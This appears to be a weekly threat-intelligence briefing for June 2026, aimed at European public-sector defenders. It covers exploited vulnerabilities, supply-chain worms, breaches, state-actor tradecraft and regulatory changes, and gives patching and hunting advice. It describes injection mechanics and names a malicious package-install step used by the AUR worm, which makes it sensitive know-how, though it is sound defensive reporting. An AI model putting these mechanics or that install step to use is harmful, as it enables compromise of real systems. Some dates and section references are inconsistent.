CTI Weekly Summary — 2026-W24 (Jun 08 – Jun 14, 2026)

CVE-2026-10520 / CVE-2026-10523 — Ivanti Sentry: pre-auth command injection to root, now confirmed exploited and gateways backdoored

If you did nothing this week: any internet-facing Ivanti Sentry gateway you run is likely already compromised. The flaw moved from "advisory plus public PoC" on 10 June to confirmed in-the-wild exploitation with persistent implants by 14 June.

CVE-2026-10520 (CVSS 10.0) is an unauthenticated OS command injection in the MICS (Mobile Iron Configuration Service) administrative interface of Ivanti Sentry — the EMM/MDM enforcement gateway that proxies email and applications to managed mobile devices and is frequently exposed to the internet. watchTowr Labs published the technical analysis and a working proof-of-concept on 10 June (watchTowr Labs; daily 06-10), and a paired path (CVE-2026-10523) compounds the exposure. By 14 June SecurityAffairs and others reported that gateways were being compromised shortly after patch release, with attacker-established footholds on exposed systems (daily 06-14, SecurityAffairs).

Because the injection is pre-auth and on the management interface, the only safe assumption for an exposed, unpatched Sentry is that it has been touched. Patch to the fixed Sentry release immediately, then treat the appliance as suspect: review for unexpected child processes spawned by the Sentry service account, unexplained outbound connections, and modified web-tier files. Restrict the MICS interface to management networks — it should never have been internet-reachable.

CVE-2026-41089 — Windows Netlogon: pre-auth SYSTEM RCE on domain controllers, confirmed exploited in the EU

If you did nothing this week: every unpatched domain controller in your forest is a pre-auth remote-code-execution target as SYSTEM, and the exploitation is no longer hypothetical — CERT-EU confirmed in-the-wild abuse in its jurisdiction this week.

CVE-2026-41089 is a CVSS 9.8 stack-based buffer overflow (CWE-121) in the Windows Netlogon RPC service. It was disclosed and patched in the May/June cycle and tracked in the W23 weekly as a disclosure-and-patch story. This week CERT-EU published advisory 2026-007 (10 June) confirming active exploitation against unpatched DCs in the EU (CERT-EU 2026-007; daily 06-11). A domain controller compromise is full-domain compromise: the entire identity plane is in scope.

Patch every domain controller now — DCs are the one asset class where "patch window" is not a negotiation. Where patching lags, restrict Netlogon RPC exposure at the network layer and hunt for anomalous pre-authentication RPC traffic to DCs and for new SYSTEM-context processes on those hosts.

CVE-2026-35273 — Oracle PeopleSoft: confirmed zero-day exploited by ShinyHunters (UNC6240), education sector hit hardest

If you did nothing this week: if you run internet-reachable Oracle PeopleSoft, assume data-theft exposure — the initial-access vector that was merely attacker-asserted last week is now vendor-confirmed as a zero-day, with 100+ organisations already breached.

What was a claim-only story on 11 June became vendor-confirmed within 48 hours. Oracle assigned CVE-2026-35273 (CVSS 9.8), an unauthenticated flaw in the PeopleSoft Environment Management Hub, and shipped an out-of-band patch (Oracle security alert; daily 06-12). Mandiant and Google GTIG then formally attributed the campaign to UNC6240 (ShinyHunters) and confirmed active exploitation against 100+ organisations, with the education sector disproportionately represented; the University of Nottingham quantified roughly 455,000 affected records (Google GTIG; daily 06-13).

This is a direct hit on a sector dense with European public-sector entities — universities and research institutions running PeopleSoft for HR and campus systems. Apply Oracle's out-of-band fix, then assume data exfiltration on any instance that was internet-reachable before patching: review Environment Management Hub access logs, rotate exposed credentials, and prepare for extortion contact, which is ShinyHunters' standard follow-through.

CVE-2026-50751 — Check Point Security Gateway: IKEv1 VPN authentication bypass exploited by a Qilin affiliate `[SINGLE-SOURCE]`

If you did nothing this week: a Remote Access VPN gateway running the deprecated IKEv1 path is an active ransomware entry point — a Qilin affiliate is using this bypass for initial access.

Check Point disclosed and patched CVE-2026-50751 (CVSS 9.3) on 8 June — a certificate-validation logic flaw in the deprecated IKEv1 key exchange affecting Remote Access VPN and Mobile Access on Security Gateway (Check Point; daily 06-09). The disclosure noted exploitation by a Qilin ransomware affiliate, which puts this firmly in the inaction-equals-incident column: VPN gateways are the front door, and a ransomware crew is already through it on unpatched IKEv1 deployments.

Apply the hotfix and, where operationally possible, disable IKEv1 entirely in favour of IKEv2 — the flaw lives in a protocol path most estates no longer need. Hunt for anomalous VPN session establishment without corresponding successful certificate validation and for new Remote Access sessions from unexpected geographies.

Chaotic Eclipse / Nightmare Eclipse Windows zero-day wave — three long-tracked bugs patched, a fourth still open

This researcher's serialised zero-day disclosures have run across four weekly cycles, and this week brought both resolution and a fresh open wound. June Patch Tuesday (9 June) finally closed the three bugs the W20–W22 weeklies tracked as "expected fix in June": YellowKey (CVE-2026-45585, BitLocker bypass via the Windows Recovery Environment, physical access required), GreenPlasma (CVE-2026-45586, CTFMON elevation to SYSTEM), and MiniPlasma (a re-opened regression of CVE-2020-17103 in the Cloud Filter driver cldflt.sys), per the patch-day round-ups (BleepingComputer; Tenable).

But the cadence continued the same day. On 9 June the researcher published RoguePlanet, a TOCTOU race in the Microsoft Defender scan engine yielding a SYSTEM shell — hours after the patches landed, with no CVE and no fix (BleepingComputer; daily 06-11). Two days later came GreatXML, a BitLocker bypass via crafted XML on the recovery partition — PoC public, practical severity contested, still unpatched (SecurityWeek; daily 06-12). The trajectory: deploy the June cumulative update to close the three patched bugs, retain BitLocker PIN/TPM policy regardless, and keep monitoring MSRC — the fourth disclosure is the pattern, not the exception.

Shai-Hulud / Miasma supply-chain worm lineage — open-sourced, ported to PyPI, and a 1,500-package AUR wave

The supply-chain-worm family the W23 weekly consolidated under the Miasma/IronWorm banner spent this week proliferating across ecosystems and operators. On 9 June a SANS ISC handler tracked TeamPCP open-sourcing its Mini Shai-Hulud framework, immediately spawning a "Phantom Gyp" derivative (SANS ISC; daily 06-09). On 10 June the lineage opened a PyPI front dubbed "Hades" — 37 malicious wheels across 19 packages (The Hacker News; daily 06-10).

The week's largest wave hit the Arch User Repository. "Atomic Arch" began with roughly 400 orphaned AUR packages adopted and re-pointed to a Rust credential-stealer plus eBPF rootkit (The Hacker News; Sonatype; daily 06-13); a second wave around 12 June expanded the count further (tracker estimates range from the 400+ in primary reporting to ~1,500) and swapped some PKGBUILD delivery from npm dependency injection to bun install js-digest — active operator iteration against detection. The npm delivery mechanism has been linked by SANS ISC and subsequent reporting to the broader Shai-Hulud supply-chain family. Official Arch core/extra repositories were not affected; only adopted AUR packages. For defenders the through-line is constant: install-time script execution is the kill chain, and npm/bun/AUR build steps need to be treated as untrusted code execution in CI/CD.

Maine breach-notification portal hoax — fraudulent filings against VRChat and Discord, then the portal goes dark

A two-day arc that doubles as a fake-news cautionary tale. On 12 June, Maine's Attorney-General breach-notification portal published two fraudulent filings — one claiming a 2.4-million-user VRChat compromise, another a 10-million-user Discord breach — because the portal accepted submissions without verifying the submitter; both companies denied any breach (BleepingComputer; daily 06-12). On 12 June the Maine AG issued a formal statement confirming the filings were a hoax and took the portal offline (Maine AG; daily 06-13). The defender lesson is sourcing discipline: a government breach-notification portal is normally a high-reliability primary, but an unauthenticated submission path turned it into a vector for fabricated breach claims. Treat single-portal breach assertions as claim-only until the named victim confirms.

CVE-2026-20253 — Splunk Enterprise: unauthenticated arbitrary file creation/truncation via the PostgreSQL sidecar proxy `[SINGLE-SOURCE]`

Disclosed this week and not yet seen exploited, but it belongs in the operationally-critical tier because Splunk is the SIEM/log-analytics backbone in many SOCs — including public-sector ones — and an unauthenticated flaw on your detection platform is a defender's worst-case blind spot. Per Splunk's advisory, CVE-2026-20253 (CVSS 9.8, CWE-306 Missing Authentication for Critical Function) lets an unauthenticated actor create or truncate arbitrary files via the bundled PostgreSQL sidecar proxy in Splunk Enterprise 10.0.0–10.0.6 and 10.2.0–10.2.3 — a primitive that can be chained toward code execution but which the advisory itself scopes as file creation/truncation rather than direct RCE (Splunk SVD-2026-0603; daily 06-14). Patch to the fixed maintenance releases; where the Splunk web/API tier is internet-reachable, restrict it now — a compromised SIEM lets an attacker both pivot and rewrite the evidence.

CVE-2026-49261 — MariaDB Galera cluster: pre-auth lateral RCE via `wsrep_notify_cmd`

NCSC-CH's Security Hub flagged a CVSS 10.0 OS command injection (post 12627, 11 June) that did not surface in the daily briefs. When MariaDB Community or Enterprise Server runs in a Galera cluster with wsrep_notify_cmd configured, the notification command is built by interpolating peer-supplied wsrep_node_name and wsrep_node_incoming_address fields directly into a string passed to sh -c — without escaping (NCSC-CH Security Hub; MariaDB CVE list). A malicious or compromised cluster peer that announces a node name containing shell metacharacters achieves arbitrary command execution on every cluster member with a notify command configured, at the privilege of the database process — lateral RCE across the whole cluster, DB authentication bypassed. Fixed in Community 10.6.27 / 10.11.18 / 11.4.12 / 11.8.8 / 12.3.2 and the corresponding Enterprise builds. This matters for European public-sector estates because MariaDB underpins a great deal of self-hosted open-source tooling (Nextcloud, Moodle, GLPI). Patch immediately; if Galera notifications are required, restrict cluster-join initiation to trusted internal nodes at the network layer (Galera ports 4567/4568) and disable wsrep_notify_cmd where it is not strictly needed.

CVE-2026-44748 — SAP NetWeaver AS ABAP: SAML XML Signature Wrapping (CVSS 9.9) `[SINGLE-SOURCE]`

SAP's June Patch Day (9 June) shipped multiple HotNews notes; the most severe affect NetWeaver AS ABAP and the ABAP Platform — the ERP backbone across Swiss federal/cantonal administration and EU public-sector finance. CVE-2026-44748 (CVSS 9.9) is a SAML XML Signature Wrapping flaw, paired with an unauthenticated RFC kernel memory-corruption bug (CVSS 9.8) (Onapsis; daily 06-10). Signature-wrapping bugs let an attacker forge an assertion that passes signature validation while carrying attacker-chosen identity content — an authentication bypass against SAML-federated logins. Apply the June HotNews notes; for SAML federation, verify the patched NetWeaver enforces strict assertion-to-signature binding, and hunt for logons with valid-but-anomalous assertion structure.

CVE-2025-8088 — WinRAR path traversal: still fuelling Ukraine intrusions a year after the fix `[SINGLE-SOURCE]`

A reminder that "patched" is not "remediated" where users don't update. Trend Micro documented two Russia-aligned campaigns still exploiting CVE-2025-8088 — a path traversal via NTFS Alternate Data Streams in WinRAR patched in July 2025 — nearly a year on: GIFTEDCROOK delivery via UAC-0226 and an Earth Dahu chain (Trend Micro; daily 06-10). The operational takeaway for any estate with desktop WinRAR: inventory and force-update, because the archived-fix assumption is exactly what these operators rely on.

Public administration — the week's centre of gravity

The public sector again carried the highest concentration of operationally severe items. France's sovereign Tchap messenger breach (§ 5) struck the French civil service directly; NCSC-CH's Week 23 report documented a coordinated surge in job-seeker targeting against Swiss residents — fake interviews, reshipping identity theft, and LinkedIn-to-GitHub infostealer delivery (NCSC-CH; daily 06-10); and ENISA ran its biennial Cyber Europe 2026 exercise (10–11 June), testing the revised EU Cyber Blueprint and triggering the first live activation of the EU Cybersecurity Reserve (ENISA; daily 06-14). The pattern for a Swiss/EU public-sector SOC: the threats are arriving through identity and through suppliers, and the EU's collective-response machinery is being stress-tested precisely because that is where the pressure is.

Education — ShinyHunters' PeopleSoft campaign lands disproportionately on universities

The week's clearest sectoral concentration. Mandiant/GTIG's attribution of the Oracle PeopleSoft zero-day campaign (§ 1) explicitly noted that the education sector was hit hardest, with the University of Nottingham confirming ~455,000 affected records (Google GTIG; daily 06-13). It rhymes with the earlier Oxford University CareerConnect breach, where third-party provider Group GTI's compromise exposed students across multiple UK universities (Oxford; daily 06-09). European higher-education ICT teams running PeopleSoft or relying on shared careers/HR SaaS should treat both as direct warnings.

Healthcare & energy — large-scale personal-data exposure from theft and from mishandling

Two contrasting root causes in one week. Novo Nordisk disclosed the theft of non-public data including personal data after an external party accessed internal systems (§ 5) — a deliberate intrusion against pharma. At the other end, Kyushu Electric's transmission/distribution subsidiary lost an unencrypted portable SSD holding personal records for roughly 10.9 million customers — reportedly Japan's largest personal-data breach, and an entirely preventable one (BleepingComputer; daily 06-14). For utilities and healthcare data custodians the joint lesson is unglamorous: full-disk encryption on removable media is still the control that turns a lost-device headline into a non-event.

France's Tchap government messenger — account-takeover scrapes 73,467 civil servants' metadata

The most consequential public-sector incident of the week. On 7 June ANSSI detected a compromise of Tchap, the French state's sovereign Matrix-based encrypted messenger used by ~825,000 civil servants across all ministries; DINUM published the disclosure (DINUM; daily 06-10). The attacker used account takeover to scrape directory metadata on 73,467 users; message content, protected by end-to-end encryption, was not exposed, and CNIL was notified. The defender takeaway is that "sovereign and E2E-encrypted" still leaves a metadata-harvesting surface at the account/identity layer — the directory is a target even when the message body is not.

Novo Nordisk — theft of non-public data including personal data

Danish pharmaceutical maker Novo Nordisk disclosed on 11 June that an external party gained unauthorised access to a limited number of internal IT systems and copied non-public data, including personal data (Novo Nordisk; daily 06-13). The company's statement does not itemise the data categories beyond "personal data"; pharma and life-sciences SOCs should nonetheless treat research-data and personal-data repositories as crown-jewel assets, given their value for both espionage and extortion.

Law-enforcement follow-through — Conti loader developer pleads guilty, AudiA6 laundering service dismantled

Two enforcement wins with a Swiss touchpoint. Ukrainian national Oleksii Lytvynenko pleaded guilty on 12 June in US federal court (Middle District of Tennessee) to conspiracy to commit wire fraud for his role developing loaders for the Conti ransomware operation, after extradition from Ireland (DOJ via GlobalSecurity; daily 06-14). Separately, a US-Secret-Service-led operation with Europol, Eurojust and ten countries — Switzerland among the participants — dismantled the AudiA6 cryptocurrency money-laundering service and charged two individuals (US Secret Service; daily 06-12). The cumulative signal: the affiliate-and-launderer layer of the ransomware economy continues to be peeled back through international cooperation, with Swiss authorities now routinely in the coalition.

South Korea fines Coupang a record ₩624.7 bn over an unrevoked signing key

A regulatory follow-up worth a defender's attention because the root cause is mundane and universal. South Korea's Personal Information Protection Commission issued its largest-ever penalty against e-commerce platform Coupang, attributing a breach of tens of millions of customer records to a signing key that a former employee had stolen before departing and then used to harvest customer data undetected for months (The Record; daily 06-13). Key custody and anomaly detection on signing-key use are the controls that failed — and the months of undetected access is the part that turned an insider theft into a record fine.

CrowdStrike 2026 Technology Threat Landscape Report — "technology = most-targeted" reads as prophecy against this week's incidents `[SINGLE-SOURCE]`

CrowdStrike's report (published 9 June, distilled in the 06-11 daily) found technology to be the most-targeted sector. Rather than re-recap it, the weekly's lens is corroboration: this very week supplied the evidence. The Shai-Hulud/Atomic Arch supply-chain wave (§ 2), the ShinyHunters PeopleSoft zero-day (§ 1), and the run of AI-developer-platform flaws (Langflow, LangGraph, LiteLLM in § 3) are all attacks on the technology supply chain and the developer toolchain rather than merely through it. For a public-sector SOC the implication is that the technology vendors and open-source components in your stack are themselves now the front line — SBOM-driven component inventory (see § 8) is the prerequisite for reasoning about it.

VerdantBamboo (UNC5221 / WARP PANDA) — BSD-compiled BRICKSTORM confirmed on pfSense, plus a new PLENET backdoor

key: actor:VerdantBamboo. The W23 weekly first carried Volexity's IR disclosure of this China-nexus operator; follow-up reporting this week fills in the technical chain. Volexity's case describes a BSD-compiled variant of the BRICKSTORM Golang backdoor on an MSP customer's pfSense firewall, reached after compromising an Egnyte Storage Sync appliance (local privilege escalation via default egnyteservice sudo permissions, fixed in Storage Sync v13.13), plus a previously-undocumented .NET Native AOT backdoor named PLENET on a Synology NAS and an AGENTPSD dropper (Volexity; The Hacker News). The BSD variant is the status-changing detail: it confirms VerdantBamboo can operate on FreeBSD-based appliances, beyond the Linux-only model where enterprise EDR is already blind. The intrusion ran ~18 months undetected and was used to proxy through the MSP into customer Microsoft 365 tenants via Conditional Access bypass. Outstanding question for defenders: edge appliances (firewalls, NAS, sync gateways) remain the EDR dead zone — the hunt has to move to network-flow anomalies and appliance-integrity baselining, not endpoint telemetry.

Velvet Ant "Operation Highland" — Sygnia documents decade-long Linux PAM/sshd subversion

key: campaign:velvet-ant-operation-highland-2026. Sygnia's "Operation Highland" report, relayed in detail by The Hacker News on 12 June and deep-dived in the 06-13 daily, documents a China-nexus intrusion set that held covert access to an air-gapped network for nearly a decade (earliest traces ~2016) by subverting the Linux authentication stack: nine distinct backdoored pam_unix.so variants and credential-logging sshd/ssh binaries that suppress their own logging during operator sessions (The Hacker News; Sygnia — Operation Highland). The horizon framing the dailies could not give: this is the same tradecraft class as VerdantBamboo's edge-appliance persistence — long-dwell, identity/auth-layer implants on systems outside EDR coverage. The two together describe a sustained China-nexus investment in living below the endpoint-detection line. Defender watch-item: integrity-monitor PAM modules and sshd/ssh binaries against package checksums (rpm -V / dpkg --verify, AIDE/Tripwire), and treat air-gap as a latency control, not an isolation guarantee.

APT28 (GRU Unit 26165) — Sekoia documents a shift to LLM-generated payloads and cloud-native C2 `[SINGLE-SOURCE]`

key: campaign:apt28-tradecraft-evolution-2026. Sekoia's tradecraft-evolution retrospective (covered in the 06-14 daily) is worth tracking as a forward indicator rather than a single incident: the 2025–2026 tooling shows LLM-generated payloads (the LameHug stealer), cloud-native command-and-control (BeardShell), and router DNS-hijack persistence (FrostArmada) (Sekoia). The status-update value is the direction of travel: a top-tier Russian state operator is now industrialising LLM-assisted payload generation, which raises the baseline volume and variability of what defenders will see. Single-source (Sekoia TDR) and reported as the actor's TTPs, not new incidents — track it as a capability trend, not an active breach.

European Commission refers France and Spain to the CJEU over NIS2 non-transposition `[SINGLE-SOURCE]`

The week's most consequential regulatory move. The Commission referred France and Spain to the Court of Justice of the EU on ~9 June — the third and final stage of the infringement procedure — for failing to transpose NIS2 (Directive 2022/2555) more than 19 months past the October 2024 deadline (Brussels Signal). The CJEU can impose lump-sum fines and daily penalties until transposition completes. What defenders need to do differently: entities in non-transposed states operate in a legal grey zone — NIS2's substantive Article 21 security measures and Article 23 reporting windows apply as the floor even where the national implementing law and its competent authority do not yet exist. Swiss federal agencies and cantonal governments with regulated counterparts or outsourced providers in France or Spain should treat NIS2 Article 21 as the baseline regardless of national enforcement status, and watch the remaining non-transposers for the same escalation.

Germany's Bundestag opens first reading of the CRA domestic-implementation bill

Drucksache 21/6134 — "zur Durchführung der Verordnung (EU) 2024/2847" — had its first reading on 11 June, designating Germany's national CRA authorities, notified bodies and enforcement routes, with BSI the anticipated primary market-surveillance authority (Deutscher Bundestag). This is distinct from the general CRA notifying-authority deadline the W23 weekly tracked: it is the German legislative step starting the parliamentary clock (committee stage next, second/third readings and Bundesrat consent expected Q4 2026). The CRA's Chapter IV (notified bodies) entered force EU-wide the same day. What to do differently: Swiss ICT vendors exporting digital products to the German public sector, and German public-sector procurers, should track committee amendments now — the national authority designation determines who you report to and who surveils your products under the CRA.

ENISA publishes the first EU-wide SBOM Adoption State of Play — consumption lags generation

ENISA released its end-2025 SBOM adoption survey on 9 June — the first EU-wide empirical baseline (ENISA). The report confirms the CRA is the primary accelerant of SBOM adoption and that organisations are investing in SBOM generation and SDLC/CI-CD integration. The practical gap this creates — generation capability advancing faster than operational consumption (ingesting a vendor's SBOM into your own vulnerability-management workflow) — is the operational challenge it implies for Swiss/EU procurers; that framing is this brief's inference, not a stated headline of the report. It lands 94 days before the CRA's 11 September reporting-platform milestone. What to do differently: for public-sector procurement, demand SBOM deliverables in tenders now and verify your own consuming capability — generating SBOMs satisfies a producer obligation, but the defensive value (correlating known-bad components against CVE feeds) only materialises if you can ingest supplier SBOMs before the reporting obligation begins. This connects directly to § 6's "technology is the front line" synthesis.

EDPB adopts a harmonised GDPR Article 33 breach-notification template

The European Data Protection Board adopted a common EU/EEA personal-data-breach notification template under GDPR Article 33 at its 10 June plenary, opening it for public consultation until 5 August (EDPB; daily 06-11). What to do differently: breach-response runbooks that currently target per-DPA notification formats should be reviewed against the harmonised template during the consultation window — a single common format reduces the cross-border friction that has historically slowed multi-jurisdiction breach reporting, but only if your incident-response process pre-maps its fields.

CISA replaces the flat KEV 14-day rule with risk-tiered remediation (BOD 26-04)

CISA issued Binding Operational Directive 26-04 on 10 June, superseding BOD 19-02 and BOD 22-01 and replacing the flat 14-day KEV remediation rule with risk-tiered deadlines, including a 3-day class for the worst exposures (CISA; daily 06-12). The deadlines bind only US Federal Civilian Executive Branch agencies and carry no compliance weight in CH/EU. What to do differently — and what not to: the useful signal for a Swiss/EU SOC is the risk-tiering model (exploitation status and exposure driving remediation urgency), not the deadlines themselves; the KEV listing flag remains jurisdiction-agnostic confirmation of in-the-wild exploitation, but a KEV deadline is never the reason an item is urgent for this audience.